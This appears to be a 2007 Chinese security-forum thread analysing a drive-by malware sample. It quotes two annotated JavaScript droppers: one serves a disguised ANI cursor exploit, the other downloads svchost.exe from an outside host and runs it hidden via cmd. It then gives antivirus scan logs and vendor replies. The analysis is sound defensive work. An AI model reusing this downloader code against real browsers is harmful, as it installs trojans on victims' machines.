楼主: allenhippo

[病毒样本] 5/23 21:00上传,还是svchost!(可能流行的样本)

allenhippo
 楼主| 发表于 2007-5-23 22:38:03 | 显示全部楼层
原帖由 zzh161 于 2007-5-23 22:34 发表
趋势杀了第二个


有两个js,还有个呢
dikex
发表于 2007-5-23 22:45:42 | 显示全部楼层
那两个JS文件貌似是很久之前的东西了


new.js
  // Sample analysis (new.js). Builds an HTML fragment in `info` and writes it
  // into the page (last line). The fragment contains a hidden div and a script
  // that, only on IE with 5 < version <= 7 running Windows 2000 or XP, fills
  // that div with an element whose CSS `cursor` points at a remote file served
  // as ".jpg" from 16a.us. Another post in this thread (hj5abc) identifies
  // that file as an animated-cursor (ANI) file, so the .jpg extension is a
  // disguise; the specific vulnerability is not identified on this page.
  // NOTE(review): as pasted, the inner double quotes are not escaped (e.g.
  // content="zh-cn"), so this listing is not syntactically valid as-is —
  // presumably mangled by the forum copy, not the original script text.
  1. info =  "<head>" +"\n"+
  2.   "<meta http-equiv="Content-Language" content="zh-cn">" +"\n"+
  3.   "</head>" +"\n"+
  // Two hidden divs with the same id; getElementById() below sees only the first.
  4.   "<div id="new_content_jp" style="display:none"></div>" +"\n"+
  5.   "<div id="new_content_jp" style="display:none"></div>" +"\n"+
  6.   "<script language="javascript" >" +"\n"+
  // Victim fingerprinting: the browser must report MSIE with 5 < version <= 7
  // (IE 5.5, 6 or 7); anything else gets no payload.
  7.   "function checkIE(){" +"\n"+
  8.   "var jpDiv = document.getElementById("new_content_jp")" +"\n"+
  9.   "var a=navigator.userAgent.toLowerCase();" +"\n"+
  10.   "if (navigator.appVersion.indexOf(\'MSIE\')!=-1){" +"\n"+
  11.   " version=parseFloat(navigator.appVersion.split(\'MSIE\')[1])" +"\n"+
  12.   " if (version>5 && version<=7){" +"\n"+
  // OS detection from the user-agent string. w2k3 is computed but never used:
  // only XP and 2000 victims are served the payload.
  13.   "  w2k = ((a.indexOf(\'windows nt 5.0\')!=-1) || (a.indexOf(\'windows 2000\')!=-1));" +"\n"+
  14.   "  wxp = ((a.indexOf(\'windows nt 5.1\')!=-1) || (a.indexOf(\'windows xp\')!=-1));" +"\n"+
  15.   "  w2k3 = ((a.indexOf(\'windows nt 5.2\')!=-1) || (a.indexOf(\'windows 2003\')!=-1));" +"\n"+
  16.   "" +"\n"+
  // Payload delivery: injecting a `cursor: url(...)` style via innerHTML makes
  // IE fetch and parse the remote cursor file without any visible element.
  // Both branches set the identical markup (the cursor URL is repeated twice).
  17.   "  if(wxp)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\">";" +"\n"+
  18.   "  if(w2k)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\">";" +"\n"+
  19.   " }" +"\n"+
  20.   "" +"\n"+
  21.   "}" +"\n"+
  22.   "" +"\n"+
  23.   "}" +"\n"+
  // Runs checkIE() 300 ms after the fragment is written, via a string-argument
  // setTimeout (the string is evaluated as code).
  24.   "setTimeout("checkIE();",300);" +"\n"+
  25.   "</script>" +"\n"+
  // Swallow all script errors so a failed attempt shows nothing to the user.
  26.   "<script>window.onerror=function(){return true;}</script>"
  27. document.write(info)


hxxp://16a[.]us/oK/MyTest2.jpg （已去活化，勿直接打开；楼下 hj5abc 指出这其实是伪装成 .jpg 的 ANI 光标文件）

Vernum.js,只把主要的16进制转换了一下（下面列表中 COM 对象名等仍保留 \x 形式的十六进制转义，解码结果见注释）
  // Sample analysis (Vernum.js): a downloader/dropper. Each line below is a
  // document.writeln() that emits one line of the real script into the page,
  // so the decoded payload only exists in the DOM at run time. The \x escapes
  // decode as noted per line. Net effect: GET svchost.exe from 7y7.us over
  // plain HTTP, write it to a random "clssidNNNN.tmp" file under the Windows
  // folder, and run it through a hidden `cmd.exe /c`.
  // Suppress script errors first so nothing is shown if any step fails.
  1. document.writeln("<script>window.onerror=function(){return true;}<\/script>");
  2. document.writeln("<script>");
  // Download URL (see the defanged copy quoted after this listing).
  3. document.writeln("DZ='http://7y7.us/oK/svchost.exe';");
  // GnMs(n): random drop-file name 'clssid<0..n>.tmp'. The closing quote after
  // clssid is unescaped here — a copy artifact of the forum paste.
  4. document.writeln("function GnMs(n) ");
  5. document.writeln("{ ");
  6. document.writeln(" var numberMs = Math.random()*n;");
  7. document.writeln(" return \'clssid'+Math.round(numberMs)+\'.tmp\';");
  8. document.writeln("} ");
  // Everything below runs inside try/catch; see the catch at the end.
  9. document.writeln(" try ");
  10. document.writeln("{");
  // "\x6F\x62\x6A\x65\x63\x74" = "object": an <object> element whose
  // CreateObject() method is used to instantiate COM objects instead of
  // new ActiveXObject(); presumably chosen to dodge safe-for-scripting checks
  // and signatures on the "ActiveXObject" string — not verified on this page.
  11. document.writeln(" var Bf=document.createElement("\\x6F\\x62\\x6A\\x65\\x63\\x74");");
  // NOTE(review): the classid value is missing from this listing as pasted;
  // do not assume which control was targeted.
  12. document.writeln(" Bf.setAttribute("classid");");
  // "Microsoft.X" + "MLHTTP" = "Microsoft.XMLHTTP" (string split to break signatures).
  13. document.writeln(" var Kx=Bf.CreateObject("\\x4D\\x69\\x63\\x72\\x6F\\x73\\x6F\\x66\\x74\\x2E\\x58"+"\\x4D\\x4C\\x48\\x54\\x54\\x50","");");
  // "Adodb.Stream"
  14. document.writeln(" var AS=Bf.CreateObject("\\x41\\x64\\x6F\\x64\\x62\\x2E\\x53\\x74\\x72\\x65\\x61\\x6D","");");
  // type=1: binary stream (adTypeBinary), so the PE is written byte-for-byte.
  15. document.writeln(" AS.type=1;");
  // "GET" DZ, third argument 0 = synchronous, so responseBody is ready after send().
  16. document.writeln(" Kx.open("\\x47\\x45\\x54", DZ,0);");
  17. document.writeln(" Kx.send();");
  // Random drop-file name, 0..9999.
  18. document.writeln(" Ns1=GnMs(9999);");
  // "Scripting.FileSystemObject"
  19. document.writeln(" var cF=Bf.CreateObject("\\x53\\x63\\x72\\x69\\x70\\x74\\x69\\x6E\\x67\\x2E\\x46\\x69\\x6C\\x65\\x53\\x79\\x73\\x74\\x65\\x6D\\x4F\\x62\\x6A\\x65\\x63\\x74","");");
  // GetSpecialFolder(0) is the FSO WindowsFolder constant (corroborated by
  // "\system32\cmd.exe" being built from it below). The download body is
  // written into the Windows directory, which requires write access there.
  20. document.writeln(" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);");
  // SaveToFile(path, 2): create or overwrite. Then "Shell.Application".
  21. document.writeln(" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E","");");
  // "\\system32" (a doubled backslash, which Windows path handling tolerates)
  // + "cmd.exe" => <Windows>\system32\cmd.exe
  22. document.writeln(" ok1=cF.BuildPath(NsTmp+\'\\x5C\\x5C\\x73\\x79\\x73\\x74\\x65\\x6D\\x33\\x32\',\'\\x63\\x6D\\x64\\x2E\\x65\\x78\\x65\');");
  // ShellExecute(cmd.exe, " /c <dropped file>", "", "open", 0): runs the
  // dropped file via cmd with show flag 0 (hidden window). The .tmp extension
  // presumably does not stop execution once the content is a valid PE.
  // Mixed-case "SHeLLExecute" is legal for late-bound COM and likely another
  // signature-evasion trick.
  23. document.writeln(" q.SHeLLExecute(ok1,\'\\x20\\x2F\\x63 \'+Ns1,"","\\x6F\\x70\\x65\\x6E",0);");
  24. document.writeln("} ");
  // Swallow every exception: the victim sees nothing when any step fails.
  25. document.writeln(" catch(MsI) { MsI=1; }");
  26. document.writeln("<\/script>")


hxxp://7y7[.]us/oK/svchost.exe （已去活化，勿直接访问；这是 Vernum.js 下载到 Windows 目录并通过 cmd /c 执行的可执行文件）

[ 本帖最后由 dikex 于 2007-5-23 22:47 编辑 ]
playx
发表于 2007-5-23 22:57:18 | 显示全部楼层
楼主...我在影子下运行好像没事..

svchost.rar--已上报..未回

virus.rar--有回覆

filename:  virus.rar
machine: Machine
result: This file is clean

filename: New.js
machine: Machine
result: This file is clean

filename: msg-26080-1.txt
machine: Machine
result: This file is clean

filename: Vernum.js
machine: Machine
result: This file is clean

filename: msg-26080-2.txt
machine: Machine
result: This file is clean

Developer notes:
virus.rar is a container file of type  RAR
New.js is a container file of type  MIME. This file is contained by   
virus.rar
msg-26080-1.txt  is a clean file.  This file is contained by  New.js
Vernum.js is a container file of type  MIME. This file is contained by   
virus.rar
msg-26080-2.txt  is a clean file.  This file is contained by  Vernum.js




We have determined that no virus exists on the samples provided.

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

-----------------------------------------------------------------------
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/
allenhippo
 楼主| 发表于 2007-5-23 23:10:53 | 显示全部楼层
下载的多个病毒也上传好了
mofunzone
发表于 2007-5-23 23:17:59 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\virus_download.rar'
C:\Documents and Settings\morgan\My Documents\
  virus_download.rar
    [0] Archive type: RAR
    --> New.js
        [DETECTION] Contains signature of the Java script virus JS/Crypt.Agent
        [WARNING]   Infected files in archives cannot be repaired!
    --> Vernum.js
    --> srogm.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> spglsdr.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> IEXPLORE.EXE
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> svchost(1).exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> ctfmon.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> smss.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> conime.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> csrss.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> svchost32.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> mmc.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> stpgldk.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> services.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> copypfh.exe
        [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
Begin scan in 'C:\Documents and Settings\morgan\My Documents\virus.rar'
C:\Documents and Settings\morgan\My Documents\
  virus.rar
    [0] Archive type: RAR
    --> New.js
        [DETECTION] Contains signature of the Java script virus JS/Crypt.Agent
        [WARNING]   Infected files in archives cannot be repaired!
    --> Vernum.js
        [WARNING]   The file was ignored!


End of the scan: 2007年5月23日  08:16
Used time: 00:12 min

The scan has been done completely.

      0 Scanning directories
     19 Files were scanned
     15 viruses and/or unwanted programs were found
      0 classified as suspicious:
      0 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      4 Files not concerned
      2 Archives were scanned
     17 Warnings
      0 Notes
      0 Hidden objects were found

扫描日志
NOD32版本 2285 (20070522) NT
命令行: C:\Documents and Settings\morgan\My Documents\ ?
?virus.rar C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar
正在检查NOD32.EXE文件的CRC:状态正常
D:\Eset\nod32.exe - 是正常的
扫描系统内存中:没有进行 (选项已关闭)
扫描MBR及引导区中:没有进行 (选项已关闭)
日期: 23.5.2007  时间:08:17:13
已关闭反隐藏功能.
已扫描的磁盘,文件夹及文件:C:\Documents and Settings\ ?
?morgan\My Documents\virus.rar; C:\Documents and  ?
?Settings\morgan\My Documents\virus_download.rar
C:\Documents and Settings\morgan\My Documents\virus.rar  ?
?>>RAR >>New.js - 是正常的
C:\Documents and Settings\morgan\My Documents\virus.rar  ?
?>>RAR >>Vernum.js - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>New.js - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>Vernum.js - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>srogm.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>spglsdr.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>IEXPLORE.EXE - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>svchost(1).exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>ctfmon.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>smss.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>conime.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>csrss.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>svchost32.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>mmc.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>stpgldk.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>services.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>copypfh.exe - 是正常的
已扫描的文件数目:17
已发现的病毒数目:0
完成时间: 08:17:22 总扫描时间:9 秒 (00:00:09)


[Scan path] C:\Documents and Settings\morgan\My Documents\virus_download.rar
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\New.js - Ok
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\Vernum.js - Ok
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\srogm.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\spglsdr.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\IEXPLORE.EXE infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\svchost(1).exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\ctfmon.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\smss.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\conime.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\csrss.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\svchost32.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\mmc.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\stpgldk.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\services.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\copypfh.exe infected with Trojan.PWS.Wsgame
C:\Documents and Settings\morgan\My Documents\virus_download.rar - archive contains infected objects

[Scan path] C:\Documents and Settings\morgan\My Documents\virus.rar
>C:\Documents and Settings\morgan\My Documents\virus.rar\New.js - Ok
>C:\Documents and Settings\morgan\My Documents\virus.rar\Vernum.js - Ok
C:\Documents and Settings\morgan\My Documents\virus.rar - Ok

-----------------------------------------------------------------------------
Scan statistics
-----------------------------------------------------------------------------
Objects scanned: 19
Infected objects found: 13
Objects with modifications found: 0
Suspicious objects found: 0
Adware programs found: 0
Dialer programs found: 0
Joke programs found: 0
Riskware programs found: 0
Hacktool programs found: 0
Objects cured: 0
Objects deleted: 0
Objects renamed: 0
Objects moved: 0
Objects ignored: 0
Scan speed: 203 Kb/s
Scan time: 00:00:01
playx
发表于 2007-5-23 23:18:56 | 显示全部楼层
mytest2.rar---铁克报

virus_download.rar--上报中
hj5abc
发表于 2007-5-23 23:29:36 | 显示全部楼层
NOD32 全部 就只杀了 new.js 下的那个 ANI ...
另一个JS下的svchost 挂了..

svchost下的那些 NOD32也都挂了 ..
投降了..
playx
发表于 2007-5-23 23:45:22 | 显示全部楼层
virus_download.rar回覆...分成2个rar档上报..
病毒定义码5/22..明天再试

filename:  0523v1.rar
machine: Machine
result: See the developer notes

filename: ctfmon.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: services.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: csrss.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: mmc.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: copypfh.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: IEXPLORE.EXE
machine: Machine
result: This file is detected as W32.Drom.  

filename: conime.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: New.js
machine: Machine
result: This file is clean

filename: msg-26320-1.txt
machine: Machine
result: This file is clean

Developer notes:
0523v1.rar is an infected container file of type  RAR
ctfmon.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by   0523v1.rar
services.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by   0523v1.rar
csrss.exe is non-repairable threat. Please delete this file and replace
it if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by   0523v1.rar
mmc.exe is non-repairable threat. Please delete this file and replace
it if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by   0523v1.rar
copypfh.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by   0523v1.rar
IEXPLORE.EXE is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by   0523v1.rar
conime.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by   0523v1.rar
New.js is a container file of type  MIME. This file is contained by   
0523v1.rar
msg-26320-1.txt  is a clean file.  This file is contained by  New.js



Symantec Security Response has determined that the sample(s) that you
provided are infected with a virus, worm, or Trojan. We have created
RapidRelease definitions that will detect this threat. Please follow the
instruction at the end of this email message to download and install the
latest RapidRelease definitions.
Virus definition detail:

Sequence Number:        68861
Defs Version:                90523w
Extended Version:        05/23/2007 rev.23

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

-----------------------------------------------------------------------
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/


--------------------------------------------

filename:  0523v2.rar
machine: Machine
result: See the developer notes

filename: srogm.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: stpgldk.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: svchost32.exe
machine: Machine
result: See the developer notes

filename: svchost(1).exe
machine: Machine
result: See the developer notes

filename: spglsdr.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: smss.exe
machine: Machine
result: This file is detected as W32.Drom.  

filename: Vernum.js
machine: Machine
result: This file is clean

filename: msg-3188-3.txt
machine: Machine
result: This file is clean

Developer notes:
0523v2.rar is a container file of type  RAR
srogm.exe is non-repairable threat. Please delete this file and replace
it if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by   0523v2.rar
stpgldk.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by   0523v2.rar
svchost32.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file
is contained by   0523v2.rar
svchost(1).exe Our automation was unable to identify any malicious
content in this submission.
The file will be stored for further human analysis  This file is
contained by   0523v2.rar
spglsdr.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by   0523v2.rar
smss.exe is non-repairable threat. Please delete this file and replace
it if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by   0523v2.rar
Vernum.js is a container file of type  MIME. This file is contained by   
0523v2.rar
msg-3188-3.txt  is a clean file.  This file is contained by  Vernum.js



Symantec Security Response has determined that the sample(s) that you
provided are infected with a virus, worm, or Trojan. We have created
RapidRelease definitions that will detect this threat. Please follow the
instruction at the end of this email message to download and install the
latest RapidRelease definitions.
Virus definition detail:

Sequence Number:        68861
Defs Version:                90523w
Extended Version:        05/23/2007 rev.23

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

-----------------------------------------------------------------------
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/


--------------------------------------------

[ 本帖最后由 playx 于 2007-5-24 00:05 编辑 ]
playx
发表于 2007-5-24 01:12:29 | 显示全部楼层
svchost.rar 病毒码更新已可查杀...不好意思不是来乱

..企业版更新晚一天
鼻耳盖子
发表于 2007-5-24 16:43:19 | 显示全部楼层

微点都拦了



[ 本帖最后由 鼻耳盖子 于 2007-5-24 16:44 编辑 ]
